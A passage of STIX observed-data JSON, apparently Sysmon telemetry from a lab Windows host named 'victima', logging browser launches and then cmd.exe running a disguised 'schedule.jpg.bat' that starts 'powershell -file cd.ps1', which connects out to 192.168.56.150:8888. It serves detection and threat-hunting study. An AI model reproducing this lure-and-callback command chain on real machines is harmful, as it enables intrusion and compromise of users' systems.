| "modified": "2022-07-28T16:05:22.936Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b25-62e1-1102-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b26-62e1-1202-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 5380, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=1 --customer-type=1 -- \"http://cnn.com/\"" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 4316, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --from-ie-to-edge=1 --customer-type=1 --single-argument http://cnn.com/", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:54.016974639Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:47.674Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b25-62e1-1102-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b26-62e1-1202-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:46.110Z", | |
| "last_observed": "2022-07-27T14:26:46.110Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--d379f2c9-6572-4db2-b31a-38db8d5b4365", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.937Z", | |
| "modified": "2022-07-28T16:05:22.937Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 5380, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:26:54.017642455Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:47.674Z", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b25-62e1-1102-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:46.124Z", | |
| "last_observed": "2022-07-27T14:26:46.124Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--0df31c12-8451-4a50-b029-ceb21dbda3ee", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.937Z", | |
| "modified": "2022-07-28T16:05:22.937Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:55.175965799Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:48.822Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50305, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:Do1OwVCyLHUv89IALJF5QpDqIpw=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:45.700Z", | |
| "last_observed": "2022-07-27T14:26:45.700Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--196902a1-4198-4277-b258-901c35f5014e", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.937Z", | |
| "modified": "2022-07-28T16:05:22.937Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:55.178046274Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:48.822Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50306, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:qoTJAu0r9DoNueSDFIFaIil7DzY=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:46.097Z", | |
| "last_observed": "2022-07-27T14:26:46.097Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--214f6f4c-3541-48cb-880b-8b0544130307", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.937Z", | |
| "modified": "2022-07-28T16:05:22.937Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:27:01.509817546Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:55.180Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:53.750Z", | |
| "last_observed": "2022-07-27T14:26:53.750Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--3eefdd65-bb43-459a-9699-ab5a48653e7a", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.938Z", | |
| "modified": "2022-07-28T16:05:22.938Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "\\??\\C:\\Windows\\system32\\conhost.exe", | |
| "0xffffffff", | |
| "-ForceV1" | |
| ], | |
| "parent_args": [ | |
| "C:\\Windows\\system32\\cmd.exe", | |
| "/c", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\return", | |
| "to", | |
| "office", | |
| "schedule.jpg.bat" | |
| ], | |
| "parent_args_count": 6, | |
| "parent_entity_id": "{ca21cdf6-4b33-62e1-2802-000000001400}", | |
| "pe_file_version": "10.0.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Console Window Host", | |
| "pe_original_file_name": "CONHOST.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b33-62e1-2902-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "cmd.exe", | |
| "pid": 7220, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\Alice\\AppData\\Local\\Temp\\return to office schedule.jpg.bat\"\"" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "conhost.exe", | |
| "pid": 5592, | |
| "binary_ref": "6", | |
| "command_line": "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:27:07.627762784Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:27:01.279Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "cmd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\SysWOW64" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "conhost.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "\\??\\C:\\Windows\\system32\\conhost.exe", | |
| "0xffffffff", | |
| "-ForceV1" | |
| ], | |
| "parent_args": [ | |
| "C:\\Windows\\system32\\cmd.exe", | |
| "/c", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\return", | |
| "to", | |
| "office", | |
| "schedule.jpg.bat" | |
| ], | |
| "parent_args_count": 6, | |
| "parent_entity_id": "{ca21cdf6-4b33-62e1-2802-000000001400}", | |
| "pe_file_version": "10.0.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Console Window Host", | |
| "pe_original_file_name": "CONHOST.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b33-62e1-2902-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:59.417Z", | |
| "last_observed": "2022-07-27T14:26:59.417Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--7998fd40-51c1-44c8-90dc-c8ba0aec2c2d", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.938Z", | |
| "modified": "2022-07-28T16:05:22.938Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell", | |
| "-file", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1" | |
| ], | |
| "parent_args": [ | |
| "C:\\Windows\\system32\\cmd.exe", | |
| "/c", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\return", | |
| "to", | |
| "office", | |
| "schedule.jpg.bat" | |
| ], | |
| "parent_args_count": 6, | |
| "parent_entity_id": "{ca21cdf6-4b33-62e1-2802-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b33-62e1-2a02-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "cmd.exe", | |
| "pid": 7220, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\Alice\\AppData\\Local\\Temp\\return to office schedule.jpg.bat\"\"" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 2476, | |
| "binary_ref": "6", | |
| "command_line": "powershell -file C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:27:07.629634629Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:27:01.279Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "cmd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\SysWOW64" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 2476, | |
| "binary_ref": "6", | |
| "command_line": "powershell -file C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1", | |
| "creator_user_ref": "13" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell", | |
| "-file", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1" | |
| ], | |
| "parent_args": [ | |
| "C:\\Windows\\system32\\cmd.exe", | |
| "/c", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\return", | |
| "to", | |
| "office", | |
| "schedule.jpg.bat" | |
| ], | |
| "parent_args_count": 6, | |
| "parent_entity_id": "{ca21cdf6-4b33-62e1-2802-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b33-62e1-2a02-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:59.869Z", | |
| "last_observed": "2022-07-27T14:26:59.869Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--f80bfdfa-2e6a-4151-b27c-6cc4dc1ccbb2", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.938Z", | |
| "modified": "2022-07-28T16:05:22.938Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "powershell.exe", | |
| "pid": 2476, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:27:15.728518772Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:27:09.379Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b33-62e1-2a02-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 8888, | |
| "dst_ref": "6", | |
| "src_port": 50335, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.150" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:SUB49djq3HwW/WA7Vw2sGACJGcc=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:27:06.026Z", | |
| "last_observed": "2022-07-27T14:27:06.026Z", | |
| "number_observed": 1 | |
